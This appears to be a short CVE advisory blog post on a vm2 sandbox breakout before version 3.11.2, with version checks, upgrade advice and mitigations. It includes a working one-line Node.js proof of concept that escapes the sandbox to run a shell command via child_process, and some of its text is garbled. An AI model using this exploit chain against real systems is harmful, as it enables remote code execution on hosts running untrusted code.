Listen to this Post
VM2 prior to version 3.11.2 contains a sandbox breakout vulnerability. The newly introduced method neutralizeArraySpeciesBatch works with objects from the other (sandbox) side but can call back into the host side via a getter on the array prototype. When a getter is defined on Array.prototype, it can be triggered during certain operations, exposing objects of the wrong side (host objects) into the sandbox. An attacker can then use those exposed host objects to access the host `Function` constructor and escape the sandbox. By chaining this access, arbitrary commands can be executed on the host system—as demonstrated by a proof‑of‑concept that runs `touch pwned` via child_process.execSync. The vulnerability is trivially exploitable with publicly available exploit code.
dailycve form
Platform: VM2
Version: ≤3.11.1
Vulnerability : Sandbox Breakout
Severity: Critical
date: 2026-05-03
Prediction: Patch 3.11.2
Analytics under heading What Undercode Say:
Bash commands and codes related to the blog
Check installed vm2 version npm list vm2 Upgrade to patched version npm install [email protected] Run the PoC to test (if vulnerable) node -e "const {VM}=require('vm2');new VM().run(`const a=[];Object.defineProperty(Array.prototype,0,{set(value){a.f=Buffer.prototype.inspect;value.arr.f.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');}});new Buffer(a);`)"
Exploit:
Define a setter on `Array.prototype[bash]` that captures host objects. Trigger the setter via new Buffer(a). Use the captured host `Function` to obtain the `process` object and execute arbitrary OS commands.
Protection from this CVE
Upgrade to vm2 3.11.2 immediately. If an immediate upgrade is impossible, run untrusted code inside low‑privilege containers or VMs and restrict child process creation.
Impact:
Remote Code Execution (RCE) – an attacker who can run arbitrary JavaScript inside a vm2 sandbox can escape it and execute any command on the host machine.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
